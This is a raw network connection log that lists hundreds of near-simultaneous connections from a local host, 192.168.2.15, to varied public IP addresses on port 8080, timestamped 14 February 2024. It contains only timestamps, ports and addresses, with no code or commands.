Feb 14, 2024 09:28:45.376698017 CET	6752	8080	192.168.2.15	62.157.246.63
Feb 14, 2024 09:28:45.376698017 CET	6752	8080	192.168.2.15	94.57.173.212
Feb 14, 2024 09:28:45.376712084 CET	6752	8080	192.168.2.15	94.246.125.216
Feb 14, 2024 09:28:45.376718998 CET	6752	8080	192.168.2.15	95.193.114.84
Feb 14, 2024 09:28:45.376723051 CET	6752	8080	192.168.2.15	85.30.135.40
Feb 14, 2024 09:28:45.376727104 CET	6752	8080	192.168.2.15	31.88.136.219
Feb 14, 2024 09:28:45.376729012 CET	6752	8080	192.168.2.15	95.15.8.195
Feb 14, 2024 09:28:45.376729012 CET	6752	8080	192.168.2.15	85.196.63.25
Feb 14, 2024 09:28:45.376738071 CET	6752	8080	192.168.2.15	85.81.206.45
Feb 14, 2024 09:28:45.376743078 CET	6752	8080	192.168.2.15	85.6.61.31
Feb 14, 2024 09:28:45.376749992 CET	6752	8080	192.168.2.15	62.60.48.53
Feb 14, 2024 09:28:45.376761913 CET	6752	8080	192.168.2.15	31.22.169.153
Feb 14, 2024 09:28:45.376765966 CET	6752	8080	192.168.2.15	85.132.101.189
Feb 14, 2024 09:28:45.376765966 CET	6752	8080	192.168.2.15	94.164.68.110
Feb 14, 2024 09:28:45.376769066 CET	6752	8080	192.168.2.15	62.77.42.87
Feb 14, 2024 09:28:45.376789093 CET	6752	8080	192.168.2.15	94.97.218.87
Feb 14, 2024 09:28:45.376791000 CET	6752	8080	192.168.2.15	62.98.41.68
Feb 14, 2024 09:28:45.376794100 CET	6752	8080	192.168.2.15	85.231.59.62
Feb 14, 2024 09:28:45.376794100 CET	6752	8080	192.168.2.15	94.255.119.38
Feb 14, 2024 09:28:45.376794100 CET	6752	8080	192.168.2.15	85.197.86.117
Feb 14, 2024 09:28:45.376797915 CET	6752	8080	192.168.2.15	62.96.234.64
Feb 14, 2024 09:28:45.376800060 CET	6752	8080	192.168.2.15	62.127.167.67
Feb 14, 2024 09:28:45.376807928 CET	6752	8080	192.168.2.15	85.128.155.92
Feb 14, 2024 09:28:45.376810074 CET	6752	8080	192.168.2.15	95.152.126.173
Feb 14, 2024 09:28:45.376810074 CET	6752	8080	192.168.2.15	31.230.61.62
Feb 14, 2024 09:28:45.376831055 CET	6752	8080	192.168.2.15	95.112.153.108
Feb 14, 2024 09:28:45.376831055 CET	6752	8080	192.168.2.15	31.248.236.21
Feb 14, 2024 09:28:45.376832962 CET	6752	8080	192.168.2.15	31.174.77.95
Feb 14, 2024 09:28:45.376847982 CET	6752	8080	192.168.2.15	85.46.229.170
Feb 14, 2024 09:28:45.376851082 CET	6752	8080	192.168.2.15	31.32.220.248
Feb 14, 2024 09:28:45.376859903 CET	6752	8080	192.168.2.15	95.79.17.179
Feb 14, 2024 09:28:45.376859903 CET	6752	8080	192.168.2.15	85.75.246.216
Feb 14, 2024 09:28:45.376863956 CET	6752	8080	192.168.2.15	85.25.83.247
Feb 14, 2024 09:28:45.376874924 CET	6752	8080	192.168.2.15	85.214.176.235
Feb 14, 2024 09:28:45.376878023 CET	6752	8080	192.168.2.15	85.115.1.213
Feb 14, 2024 09:28:45.376883030 CET	6752	8080	192.168.2.15	85.129.122.136
Feb 14, 2024 09:28:45.376888037 CET	6752	8080	192.168.2.15	95.35.167.213
Feb 14, 2024 09:28:45.376888037 CET	6752	8080	192.168.2.15	95.141.133.128
Feb 14, 2024 09:28:45.376913071 CET	6752	8080	192.168.2.15	95.207.76.34
Feb 14, 2024 09:28:45.376916885 CET	6752	8080	192.168.2.15	31.210.179.212
Feb 14, 2024 09:28:45.376919985 CET	6752	8080	192.168.2.15	85.245.101.131
Feb 14, 2024 09:28:45.376924038 CET	6752	8080	192.168.2.15	94.96.102.14
Feb 14, 2024 09:28:45.376930952 CET	6752	8080	192.168.2.15	85.147.132.137
Feb 14, 2024 09:28:45.376943111 CET	6752	8080	192.168.2.15	95.161.172.171
Feb 14, 2024 09:28:45.376945019 CET	6752	8080	192.168.2.15	85.81.12.130
Feb 14, 2024 09:28:45.376954079 CET	6752	8080	192.168.2.15	85.82.23.123
Feb 14, 2024 09:28:45.376955032 CET	6752	8080	192.168.2.15	85.39.148.127
Feb 14, 2024 09:28:45.376976013 CET	6752	8080	192.168.2.15	94.136.184.212
Feb 14, 2024 09:28:45.376982927 CET	6752	8080	192.168.2.15	94.98.239.20
Feb 14, 2024 09:28:45.376986980 CET	6752	8080	192.168.2.15	31.47.225.244
Feb 14, 2024 09:28:45.376992941 CET	6752	8080	192.168.2.15	94.81.141.46
Feb 14, 2024 09:28:45.376993895 CET	6752	8080	192.168.2.15	31.107.22.228
Feb 14, 2024 09:28:45.376998901 CET	6752	8080	192.168.2.15	31.190.124.167
Feb 14, 2024 09:28:45.377008915 CET	6752	8080	192.168.2.15	94.63.65.232
Feb 14, 2024 09:28:45.377012014 CET	6752	8080	192.168.2.15	85.60.19.168
Feb 14, 2024 09:28:45.377018929 CET	6752	8080	192.168.2.15	94.31.54.238
Feb 14, 2024 09:28:45.377023935 CET	6752	8080	192.168.2.15	94.71.225.8
Feb 14, 2024 09:28:45.377023935 CET	6752	8080	192.168.2.15	85.71.81.235
Feb 14, 2024 09:28:45.377023935 CET	6752	8080	192.168.2.15	62.44.199.243
Feb 14, 2024 09:28:45.377023935 CET	6752	8080	192.168.2.15	31.221.103.54
Feb 14, 2024 09:28:45.377027035 CET	6752	8080	192.168.2.15	85.231.65.27
Feb 14, 2024 09:28:45.377058983 CET	6752	8080	192.168.2.15	85.208.226.215
Feb 14, 2024 09:28:45.377067089 CET	6752	8080	192.168.2.15	95.133.27.92
Feb 14, 2024 09:28:45.377072096 CET	6752	8080	192.168.2.15	62.209.148.235
Feb 14, 2024 09:28:45.377072096 CET	6752	8080	192.168.2.15	31.170.160.15
Feb 14, 2024 09:28:45.377085924 CET	6752	8080	192.168.2.15	95.202.194.119
Feb 14, 2024 09:28:45.377090931 CET	6752	8080	192.168.2.15	85.6.143.236
Feb 14, 2024 09:28:45.377090931 CET	6752	8080	192.168.2.15	62.134.144.78
Feb 14, 2024 09:28:45.377116919 CET	6752	8080	192.168.2.15	95.187.61.5
Feb 14, 2024 09:28:45.377116919 CET	6752	8080	192.168.2.15	31.139.28.173
Feb 14, 2024 09:28:45.377123117 CET	6752	8080	192.168.2.15	95.232.156.220
Feb 14, 2024 09:28:45.377125025 CET	6752	8080	192.168.2.15	94.41.175.232
Feb 14, 2024 09:28:45.377130985 CET	6752	8080	192.168.2.15	94.219.56.75
Feb 14, 2024 09:28:45.377134085 CET	6752	8080	192.168.2.15	31.138.123.221
Feb 14, 2024 09:28:45.377139091 CET	6752	8080	192.168.2.15	31.42.127.224
Feb 14, 2024 09:28:45.377156973 CET	6752	8080	192.168.2.15	85.174.1.34
Feb 14, 2024 09:28:45.377156019 CET	6752	8080	192.168.2.15	62.201.59.191
Feb 14, 2024 09:28:45.377156019 CET	6752	8080	192.168.2.15	95.21.227.246
Feb 14, 2024 09:28:45.377157927 CET	6752	8080	192.168.2.15	85.63.91.238
Feb 14, 2024 09:28:45.377182007 CET	6752	8080	192.168.2.15	62.130.222.31
Feb 14, 2024 09:28:45.377182961 CET	6752	8080	192.168.2.15	62.113.76.215
Feb 14, 2024 09:28:45.377183914 CET	6752	8080	192.168.2.15	95.229.138.163
Feb 14, 2024 09:28:45.377185106 CET	6752	8080	192.168.2.15	31.115.35.165
Feb 14, 2024 09:28:45.377185106 CET	6752	8080	192.168.2.15	31.94.96.10
Feb 14, 2024 09:28:45.377185106 CET	6752	8080	192.168.2.15	62.253.167.1
Feb 14, 2024 09:28:45.377185106 CET	6752	8080	192.168.2.15	31.32.217.198
Feb 14, 2024 09:28:45.377185106 CET	6752	8080	192.168.2.15	94.9.185.166
Feb 14, 2024 09:28:45.377197981 CET	6752	8080	192.168.2.15	62.66.123.93
Feb 14, 2024 09:28:45.377199888 CET	6752	8080	192.168.2.15	95.209.107.83
Feb 14, 2024 09:28:45.377199888 CET	6752	8080	192.168.2.15	85.135.23.132
Feb 14, 2024 09:28:45.377199888 CET	6752	8080	192.168.2.15	62.192.225.95
Feb 14, 2024 09:28:45.377204895 CET	6752	8080	192.168.2.15	31.68.181.240
Feb 14, 2024 09:28:45.377204895 CET	6752	8080	192.168.2.15	31.205.216.239
Feb 14, 2024 09:28:45.377218008 CET	6752	8080	192.168.2.15	31.136.97.55
Feb 14, 2024 09:28:45.377228022 CET	6752	8080	192.168.2.15	94.154.247.168
Feb 14, 2024 09:28:45.377229929 CET	6752	8080	192.168.2.15	62.45.36.183
Feb 14, 2024 09:28:45.377229929 CET	6752	8080	192.168.2.15	85.90.232.155
Feb 14, 2024 09:28:45.377234936 CET	6752	8080	192.168.2.15	85.152.183.22
Feb 14, 2024 09:28:45.377239943 CET	6752	8080	192.168.2.15	62.122.223.112
Feb 14, 2024 09:28:45.377243042 CET	6752	8080	192.168.2.15	95.187.124.205
Feb 14, 2024 09:28:45.377244949 CET	6752	8080	192.168.2.15	31.120.226.81
Feb 14, 2024 09:28:45.377245903 CET	6752	8080	192.168.2.15	85.153.40.82
Feb 14, 2024 09:28:45.377264023 CET	6752	8080	192.168.2.15	94.153.195.80
Feb 14, 2024 09:28:45.377264977 CET	6752	8080	192.168.2.15	95.245.93.237
Feb 14, 2024 09:28:45.377264977 CET	6752	8080	192.168.2.15	85.212.229.227
Feb 14, 2024 09:28:45.377264977 CET	6752	8080	192.168.2.15	31.115.123.129
Feb 14, 2024 09:28:45.377270937 CET	6752	8080	192.168.2.15	62.100.198.254
Feb 14, 2024 09:28:45.377270937 CET	6752	8080	192.168.2.15	31.72.30.215
Feb 14, 2024 09:28:45.377280951 CET	6752	8080	192.168.2.15	31.199.83.127
Feb 14, 2024 09:28:45.377286911 CET	6752	8080	192.168.2.15	94.192.53.7
Feb 14, 2024 09:28:45.377290964 CET	6752	8080	192.168.2.15	62.37.115.166
Feb 14, 2024 09:28:45.377299070 CET	6752	8080	192.168.2.15	85.61.91.226
Feb 14, 2024 09:28:45.377307892 CET	6752	8080	192.168.2.15	85.49.54.120
Feb 14, 2024 09:28:45.377307892 CET	6752	8080	192.168.2.15	31.67.117.143
Feb 14, 2024 09:28:45.377320051 CET	6752	8080	192.168.2.15	95.10.13.4
Feb 14, 2024 09:28:45.377320051 CET	6752	8080	192.168.2.15	94.80.217.226
Feb 14, 2024 09:28:45.377320051 CET	6752	8080	192.168.2.15	94.177.191.233
Feb 14, 2024 09:28:45.377331018 CET	6752	8080	192.168.2.15	62.114.222.182
Feb 14, 2024 09:28:45.377334118 CET	6752	8080	192.168.2.15	94.212.0.6
Feb 14, 2024 09:28:45.377335072 CET	6752	8080	192.168.2.15	85.135.252.2
Feb 14, 2024 09:28:45.377362013 CET	6752	8080	192.168.2.15	85.138.82.152
Feb 14, 2024 09:28:45.377362967 CET	6752	8080	192.168.2.15	62.240.104.3
Feb 14, 2024 09:28:45.377365112 CET	6752	8080	192.168.2.15	62.34.47.85
Feb 14, 2024 09:28:45.377365112 CET	6752	8080	192.168.2.15	62.31.0.160
Feb 14, 2024 09:28:45.377365112 CET	6752	8080	192.168.2.15	31.42.99.184
Feb 14, 2024 09:28:45.377372980 CET	6752	8080	192.168.2.15	94.19.246.48
Feb 14, 2024 09:28:45.377399921 CET	6752	8080	192.168.2.15	95.115.158.139
Feb 14, 2024 09:28:45.377401114 CET	6752	8080	192.168.2.15	31.158.101.227
Feb 14, 2024 09:28:45.377413034 CET	6752	8080	192.168.2.15	85.125.158.17
Feb 14, 2024 09:28:45.377413034 CET	6752	8080	192.168.2.15	62.5.219.3
Feb 14, 2024 09:28:45.377418041 CET	6752	8080	192.168.2.15	62.97.188.152
Feb 14, 2024 09:28:45.377424002 CET	6752	8080	192.168.2.15	95.93.14.11
Feb 14, 2024 09:28:45.377425909 CET	6752	8080	192.168.2.15	31.56.57.90
Feb 14, 2024 09:28:45.377430916 CET	6752	8080	192.168.2.15	94.115.59.97
Feb 14, 2024 09:28:45.377434015 CET	6752	8080	192.168.2.15	94.200.225.156
Feb 14, 2024 09:28:45.377435923 CET	6752	8080	192.168.2.15	31.172.59.173
Feb 14, 2024 09:28:45.377444029 CET	6752	8080	192.168.2.15	85.187.34.252
Feb 14, 2024 09:28:45.377444983 CET	6752	8080	192.168.2.15	62.17.187.120
Feb 14, 2024 09:28:45.377454996 CET	6752	8080	192.168.2.15	95.88.58.50
Feb 14, 2024 09:28:45.377456903 CET	6752	8080	192.168.2.15	85.201.82.154
Feb 14, 2024 09:28:45.377479076 CET	6752	8080	192.168.2.15	62.1.253.120
Feb 14, 2024 09:28:45.377480030 CET	6752	8080	192.168.2.15	95.232.86.174
Feb 14, 2024 09:28:45.377480030 CET	6752	8080	192.168.2.15	94.41.170.135
Feb 14, 2024 09:28:45.377496004 CET	6752	8080	192.168.2.15	85.26.90.31
Feb 14, 2024 09:28:45.377507925 CET	6752	8080	192.168.2.15	95.188.213.236
Feb 14, 2024 09:28:45.377513885 CET	6752	8080	192.168.2.15	62.222.211.53
Feb 14, 2024 09:28:45.377526045 CET	6752	8080	192.168.2.15	85.142.103.251
Feb 14, 2024 09:28:45.377528906 CET	6752	8080	192.168.2.15	94.206.180.96
Feb 14, 2024 09:28:45.377528906 CET	6752	8080	192.168.2.15	31.15.26.204
Feb 14, 2024 09:28:45.377531052 CET	6752	8080	192.168.2.15	95.105.32.218
Feb 14, 2024 09:28:45.377531052 CET	6752	8080	192.168.2.15	94.75.174.213
Feb 14, 2024 09:28:45.377532959 CET	6752	8080	192.168.2.15	95.160.52.145
Feb 14, 2024 09:28:45.377532959 CET	6752	8080	192.168.2.15	85.148.178.49
Feb 14, 2024 09:28:45.377532959 CET	6752	8080	192.168.2.15	95.89.170.49
Feb 14, 2024 09:28:45.377533913 CET	6752	8080	192.168.2.15	62.24.188.183
Feb 14, 2024 09:28:45.377532959 CET	6752	8080	192.168.2.15	31.180.96.146
Feb 14, 2024 09:28:45.377546072 CET	6752	8080	192.168.2.15	85.182.209.105
Feb 14, 2024 09:28:45.377562046 CET	6752	8080	192.168.2.15	62.116.193.9
Feb 14, 2024 09:28:45.377566099 CET	6752	8080	192.168.2.15	95.4.209.65
Feb 14, 2024 09:28:45.377573967 CET	6752	8080	192.168.2.15	62.219.21.224
Feb 14, 2024 09:28:45.377573967 CET	6752	8080	192.168.2.15	95.198.231.146
Feb 14, 2024 09:28:45.377578974 CET	6752	8080	192.168.2.15	94.204.191.91
Feb 14, 2024 09:28:45.377579927 CET	6752	8080	192.168.2.15	94.86.96.76
Feb 14, 2024 09:28:45.377580881 CET	6752	8080	192.168.2.15	94.222.63.8
Feb 14, 2024 09:28:45.377590895 CET	6752	8080	192.168.2.15	62.59.11.14
Feb 14, 2024 09:28:45.377604008 CET	6752	8080	192.168.2.15	31.184.186.239
Feb 14, 2024 09:28:45.377608061 CET	6752	8080	192.168.2.15	95.230.2.127
Feb 14, 2024 09:28:45.377608061 CET	6752	8080	192.168.2.15	31.182.169.207
Feb 14, 2024 09:28:45.377608061 CET	6752	8080	192.168.2.15	31.208.24.103
Feb 14, 2024 09:28:45.377613068 CET	6752	8080	192.168.2.15	95.130.202.106
Feb 14, 2024 09:28:45.377615929 CET	6752	8080	192.168.2.15	62.194.132.77
Feb 14, 2024 09:28:45.377616882 CET	6752	8080	192.168.2.15	85.89.229.46
Feb 14, 2024 09:28:45.377624035 CET	6752	8080	192.168.2.15	62.37.89.237
Feb 14, 2024 09:28:45.377626896 CET	6752	8080	192.168.2.15	94.252.111.159
Feb 14, 2024 09:28:45.377635956 CET	6752	8080	192.168.2.15	31.11.63.113
Feb 14, 2024 09:28:45.377639055 CET	6752	8080	192.168.2.15	94.65.90.28
Feb 14, 2024 09:28:45.377648115 CET	6752	8080	192.168.2.15	62.180.168.61
Feb 14, 2024 09:28:45.377655029 CET	6752	8080	192.168.2.15	85.180.200.1
Feb 14, 2024 09:28:45.377655983 CET	6752	8080	192.168.2.15	62.149.11.70
Feb 14, 2024 09:28:45.377664089 CET	6752	8080	192.168.2.15	95.129.84.230
Feb 14, 2024 09:28:45.377686024 CET	6752	8080	192.168.2.15	31.189.220.178
Feb 14, 2024 09:28:45.377686977 CET	6752	8080	192.168.2.15	62.163.60.135
Feb 14, 2024 09:28:45.377688885 CET	6752	8080	192.168.2.15	94.171.148.97
Feb 14, 2024 09:28:45.377690077 CET	6752	8080	192.168.2.15	95.25.173.24
Feb 14, 2024 09:28:45.377693892 CET	6752	8080	192.168.2.15	31.97.253.151
Feb 14, 2024 09:28:45.377693892 CET	6752	8080	192.168.2.15	62.47.24.87
Feb 14, 2024 09:28:45.377693892 CET	6752	8080	192.168.2.15	85.201.82.160
Feb 14, 2024 09:28:45.377712011 CET	6752	8080	192.168.2.15	94.107.156.82
Feb 14, 2024 09:28:45.377716064 CET	6752	8080	192.168.2.15	85.101.51.18
Feb 14, 2024 09:28:45.377716064 CET	6752	8080	192.168.2.15	85.193.181.47
Feb 14, 2024 09:28:45.377721071 CET	6752	8080	192.168.2.15	95.225.88.38
Feb 14, 2024 09:28:45.377722025 CET	6752	8080	192.168.2.15	62.140.33.94
Feb 14, 2024 09:28:45.377722025 CET	6752	8080	192.168.2.15	31.135.34.130
Feb 14, 2024 09:28:45.377724886 CET	6752	8080	192.168.2.15	31.10.187.37
Feb 14, 2024 09:28:45.377724886 CET	6752	8080	192.168.2.15	85.26.84.51
Feb 14, 2024 09:28:45.377732038 CET	6752	8080	192.168.2.15	94.245.135.130
Feb 14, 2024 09:28:45.377732038 CET	6752	8080	192.168.2.15	94.95.121.103
Feb 14, 2024 09:28:45.377732992 CET	6752	8080	192.168.2.15	85.237.220.227
Feb 14, 2024 09:28:45.377748013 CET	6752	8080	192.168.2.15	31.72.68.196
Feb 14, 2024 09:28:45.377760887 CET	6752	8080	192.168.2.15	31.163.124.216
Feb 14, 2024 09:28:45.377763033 CET	6752	8080	192.168.2.15	62.236.166.185
Feb 14, 2024 09:28:45.377774954 CET	6752	8080	192.168.2.15	94.9.167.117
Feb 14, 2024 09:28:45.377779007 CET	6752	8080	192.168.2.15	85.153.76.134
Feb 14, 2024 09:28:45.377789021 CET	6752	8080	192.168.2.15	94.69.224.73
Feb 14, 2024 09:28:45.377789974 CET	6752	8080	192.168.2.15	94.197.158.135
Feb 14, 2024 09:28:45.377789974 CET	6752	8080	192.168.2.15	95.14.203.132
Feb 14, 2024 09:28:45.377789974 CET	6752	8080	192.168.2.15	31.100.163.62
Feb 14, 2024 09:28:45.377789974 CET	6752	8080	192.168.2.15	31.132.169.43
Feb 14, 2024 09:28:45.377803087 CET	6752	8080	192.168.2.15	62.112.252.20
Feb 14, 2024 09:28:45.377804041 CET	6752	8080	192.168.2.15	94.125.73.163
Feb 14, 2024 09:28:45.377825975 CET	6752	8080	192.168.2.15	62.253.76.125
Feb 14, 2024 09:28:45.377832890 CET	6752	8080	192.168.2.15	94.163.122.123
Feb 14, 2024 09:28:45.377839088 CET	6752	8080	192.168.2.15	31.171.244.62
Feb 14, 2024 09:28:45.377840996 CET	6752	8080	192.168.2.15	95.249.71.130
Feb 14, 2024 09:28:45.377840996 CET	6752	8080	192.168.2.15	95.190.18.220
Feb 14, 2024 09:28:45.377840996 CET	6752	8080	192.168.2.15	85.44.92.95
Feb 14, 2024 09:28:45.377840996 CET	6752	8080	192.168.2.15	62.5.172.86
Feb 14, 2024 09:28:45.377840996 CET	6752	8080	192.168.2.15	94.255.237.7
Feb 14, 2024 09:28:45.377845049 CET	6752	8080	192.168.2.15	85.148.116.191
Feb 14, 2024 09:28:45.377854109 CET	6752	8080	192.168.2.15	62.232.86.216
Feb 14, 2024 09:28:45.377855062 CET	6752	8080	192.168.2.15	85.179.84.52
Feb 14, 2024 09:28:45.377856970 CET	6752	8080	192.168.2.15	95.204.109.205
Feb 14, 2024 09:28:45.377856970 CET	6752	8080	192.168.2.15	94.69.171.197
Feb 14, 2024 09:28:45.377871037 CET	6752	8080	192.168.2.15	85.246.177.105
Feb 14, 2024 09:28:45.377871990 CET	6752	8080	192.168.2.15	95.54.213.158
Feb 14, 2024 09:28:45.377902031 CET	6752	8080	192.168.2.15	85.156.203.70
Feb 14, 2024 09:28:45.377902031 CET	6752	8080	192.168.2.15	94.119.122.6
Feb 14, 2024 09:28:45.377903938 CET	6752	8080	192.168.2.15	62.115.101.0
Feb 14, 2024 09:28:45.377903938 CET	6752	8080	192.168.2.15	62.181.29.22
Feb 14, 2024 09:28:45.377912045 CET	6752	8080	192.168.2.15	62.76.183.50
Feb 14, 2024 09:28:45.377912045 CET	6752	8080	192.168.2.15	85.120.77.82
Feb 14, 2024 09:28:45.377913952 CET	6752	8080	192.168.2.15	94.2.171.135
Feb 14, 2024 09:28:45.377913952 CET	6752	8080	192.168.2.15	85.24.57.0
Feb 14, 2024 09:28:45.377917051 CET	6752	8080	192.168.2.15	85.233.183.132
Feb 14, 2024 09:28:45.377918005 CET	6752	8080	192.168.2.15	95.167.122.169
Feb 14, 2024 09:28:45.377924919 CET	6752	8080	192.168.2.15	94.236.255.112
Feb 14, 2024 09:28:45.377938032 CET	6752	8080	192.168.2.15	62.108.222.26
Feb 14, 2024 09:28:45.377938032 CET	6752	8080	192.168.2.15	94.56.173.67
Feb 14, 2024 09:28:45.377943993 CET	6752	8080	192.168.2.15	85.28.37.179
Feb 14, 2024 09:28:45.377948999 CET	6752	8080	192.168.2.15	31.84.145.186
Feb 14, 2024 09:28:45.377959013 CET	6752	8080	192.168.2.15	62.158.85.123
Feb 14, 2024 09:28:45.377962112 CET	6752	8080	192.168.2.15	31.167.81.232
Feb 14, 2024 09:28:45.377969027 CET	6752	8080	192.168.2.15	31.75.203.149
Feb 14, 2024 09:28:45.377983093 CET	6752	8080	192.168.2.15	85.151.56.119
Feb 14, 2024 09:28:45.377985001 CET	6752	8080	192.168.2.15	85.214.215.109
Feb 14, 2024 09:28:45.377985954 CET	6752	8080	192.168.2.15	62.243.173.123
Feb 14, 2024 09:28:45.377985954 CET	6752	8080	192.168.2.15	62.74.253.127
Feb 14, 2024 09:28:45.377985954 CET	6752	8080	192.168.2.15	95.35.237.41
Feb 14, 2024 09:28:45.377990007 CET	6752	8080	192.168.2.15	95.146.158.197
Feb 14, 2024 09:28:45.377996922 CET	6752	8080	192.168.2.15	62.6.140.13
Feb 14, 2024 09:28:45.378005028 CET	6752	8080	192.168.2.15	85.18.151.255
Feb 14, 2024 09:28:45.378009081 CET	6752	8080	192.168.2.15	31.24.119.107
Feb 14, 2024 09:28:45.378010988 CET	6752	8080	192.168.2.15	85.251.91.22
Feb 14, 2024 09:28:45.378026009 CET	6752	8080	192.168.2.15	95.76.180.19
Feb 14, 2024 09:28:45.378036022 CET	6752	8080	192.168.2.15	62.133.177.163
Feb 14, 2024 09:28:45.378040075 CET	6752	8080	192.168.2.15	95.92.110.39
Feb 14, 2024 09:28:45.378041029 CET	6752	8080	192.168.2.15	31.168.15.143
Feb 14, 2024 09:28:45.378045082 CET	6752	8080	192.168.2.15	95.146.224.170
Feb 14, 2024 09:28:45.378051996 CET	6752	8080	192.168.2.15	85.10.74.28
Feb 14, 2024 09:28:45.378067017 CET	6752	8080	192.168.2.15	85.241.117.31
Feb 14, 2024 09:28:45.378068924 CET	6752	8080	192.168.2.15	94.255.233.117
Feb 14, 2024 09:28:45.378068924 CET	6752	8080	192.168.2.15	95.70.120.81
Feb 14, 2024 09:28:45.378068924 CET	6752	8080	192.168.2.15	95.241.51.222
Feb 14, 2024 09:28:45.378068924 CET	6752	8080	192.168.2.15	95.158.13.237
Feb 14, 2024 09:28:45.378098965 CET	6752	8080	192.168.2.15	62.190.1.79
Feb 14, 2024 09:28:45.378099918 CET	6752	8080	192.168.2.15	94.83.201.252
Feb 14, 2024 09:28:45.378099918 CET	6752	8080	192.168.2.15	95.251.255.180
Feb 14, 2024 09:28:45.378099918 CET	6752	8080	192.168.2.15	95.181.182.33
Feb 14, 2024 09:28:45.378107071 CET	6752	8080	192.168.2.15	95.251.248.155
Feb 14, 2024 09:28:45.378113985 CET	6752	8080	192.168.2.15	95.98.3.65
Feb 14, 2024 09:28:45.378113985 CET	6752	8080	192.168.2.15	94.60.42.32
Feb 14, 2024 09:28:45.378115892 CET	6752	8080	192.168.2.15	94.216.26.131
Feb 14, 2024 09:28:45.378115892 CET	6752	8080	192.168.2.15	94.10.108.181
Feb 14, 2024 09:28:45.378139019 CET	6752	8080	192.168.2.15	62.167.169.14
Feb 14, 2024 09:28:45.378148079 CET	6752	8080	192.168.2.15	85.185.5.173
Feb 14, 2024 09:28:45.378149033 CET	6752	8080	192.168.2.15	31.197.180.175
Feb 14, 2024 09:28:45.378149033 CET	6752	8080	192.168.2.15	31.202.209.171
Feb 14, 2024 09:28:45.378160000 CET	6752	8080	192.168.2.15	95.226.82.182
Feb 14, 2024 09:28:45.378168106 CET	6752	8080	192.168.2.15	31.71.15.160
Feb 14, 2024 09:28:45.378168106 CET	6752	8080	192.168.2.15	94.176.82.74
Feb 14, 2024 09:28:45.378173113 CET	6752	8080	192.168.2.15	62.54.171.59
Feb 14, 2024 09:28:45.378177881 CET	6752	8080	192.168.2.15	31.151.232.183
Feb 14, 2024 09:28:45.378179073 CET	6752	8080	192.168.2.15	95.90.75.184
Feb 14, 2024 09:28:45.378181934 CET	6752	8080	192.168.2.15	31.243.201.13
Feb 14, 2024 09:28:45.378194094 CET	6752	8080	192.168.2.15	62.17.5.67
Feb 14, 2024 09:28:45.378195047 CET	6752	8080	192.168.2.15	31.38.128.143
Feb 14, 2024 09:28:45.378200054 CET	6752	8080	192.168.2.15	31.200.247.128
Feb 14, 2024 09:28:45.378206015 CET	6752	8080	192.168.2.15	31.187.40.37
Feb 14, 2024 09:28:45.378226042 CET	6752	8080	192.168.2.15	94.231.146.83
Feb 14, 2024 09:28:45.378226995 CET	6752	8080	192.168.2.15	95.33.11.18
Feb 14, 2024 09:28:45.378231049 CET	6752	8080	192.168.2.15	95.152.29.159
Feb 14, 2024 09:28:45.378231049 CET	6752	8080	192.168.2.15	31.33.88.83
Feb 14, 2024 09:28:45.378242970 CET	6752	8080	192.168.2.15	31.186.177.16
Feb 14, 2024 09:28:45.378257990 CET	6752	8080	192.168.2.15	62.146.243.192
Feb 14, 2024 09:28:45.378257990 CET	6752	8080	192.168.2.15	94.33.60.8
Feb 14, 2024 09:28:45.378271103 CET	6752	8080	192.168.2.15	31.198.96.20
Feb 14, 2024 09:28:45.378271103 CET	6752	8080	192.168.2.15	95.39.34.47
Feb 14, 2024 09:28:45.378271103 CET	6752	8080	192.168.2.15	95.253.125.161
Feb 14, 2024 09:28:45.378271103 CET	6752	8080	192.168.2.15	85.51.233.215
Feb 14, 2024 09:28:45.378271103 CET	6752	8080	192.168.2.15	62.39.181.116
Feb 14, 2024 09:28:45.378271103 CET	6752	8080	192.168.2.15	85.71.26.126
Feb 14, 2024 09:28:45.378271103 CET	6752	8080	192.168.2.15	95.177.132.24
Feb 14, 2024 09:28:45.378293991 CET	6752	8080	192.168.2.15	85.229.54.48
Feb 14, 2024 09:28:45.378293991 CET	6752	8080	192.168.2.15	62.220.129.59
Feb 14, 2024 09:28:45.378309011 CET	6752	8080	192.168.2.15	85.134.73.112
Feb 14, 2024 09:28:45.378310919 CET	6752	8080	192.168.2.15	62.66.118.183
Feb 14, 2024 09:28:45.378309011 CET	6752	8080	192.168.2.15	94.216.143.13
Feb 14, 2024 09:28:45.378314018 CET	6752	8080	192.168.2.15	95.216.247.36
Feb 14, 2024 09:28:45.378321886 CET	6752	8080	192.168.2.15	95.85.86.153
Feb 14, 2024 09:28:45.378329992 CET	6752	8080	192.168.2.15	95.72.25.120
Feb 14, 2024 09:28:45.378330946 CET	6752	8080	192.168.2.15	31.231.213.29
Feb 14, 2024 09:28:45.378351927 CET	6752	8080	192.168.2.15	85.39.96.206
Feb 14, 2024 09:28:45.378351927 CET	6752	8080	192.168.2.15	95.240.48.53
Feb 14, 2024 09:28:45.378362894 CET	6752	8080	192.168.2.15	62.211.113.247
Feb 14, 2024 09:28:45.378364086 CET	6752	8080	192.168.2.15	85.190.169.201
Feb 14, 2024 09:28:45.378366947 CET	6752	8080	192.168.2.15	94.225.185.205
Feb 14, 2024 09:28:45.378366947 CET	6752	8080	192.168.2.15	94.207.246.101
Feb 14, 2024 09:28:45.378367901 CET	6752	8080	192.168.2.15	94.90.237.81
Feb 14, 2024 09:28:45.378380060 CET	6752	8080	192.168.2.15	31.208.91.84
Feb 14, 2024 09:28:45.378381968 CET	6752	8080	192.168.2.15	31.60.173.20
Feb 14, 2024 09:28:45.378388882 CET	6752	8080	192.168.2.15	94.90.205.143
Feb 14, 2024 09:28:45.378388882 CET	6752	8080	192.168.2.15	95.14.64.136
Feb 14, 2024 09:28:45.378397942 CET	6752	8080	192.168.2.15	85.192.76.171
Feb 14, 2024 09:28:45.378397942 CET	6752	8080	192.168.2.15	95.99.21.28
Feb 14, 2024 09:28:45.378405094 CET	6752	8080	192.168.2.15	85.64.235.134
Feb 14, 2024 09:28:45.378407955 CET	6752	8080	192.168.2.15	85.111.101.174
Feb 14, 2024 09:28:45.378429890 CET	6752	8080	192.168.2.15	62.48.159.219
Feb 14, 2024 09:28:45.378432035 CET	6752	8080	192.168.2.15	85.44.53.98
Feb 14, 2024 09:28:45.378432989 CET	6752	8080	192.168.2.15	85.151.89.219
Feb 14, 2024 09:28:45.378432035 CET	6752	8080	192.168.2.15	94.54.73.89
Feb 14, 2024 09:28:45.378443003 CET	6752	8080	192.168.2.15	94.60.163.168
Feb 14, 2024 09:28:45.378454924 CET	6752	8080	192.168.2.15	94.232.69.88
Feb 14, 2024 09:28:45.378462076 CET	6752	8080	192.168.2.15	62.220.131.188
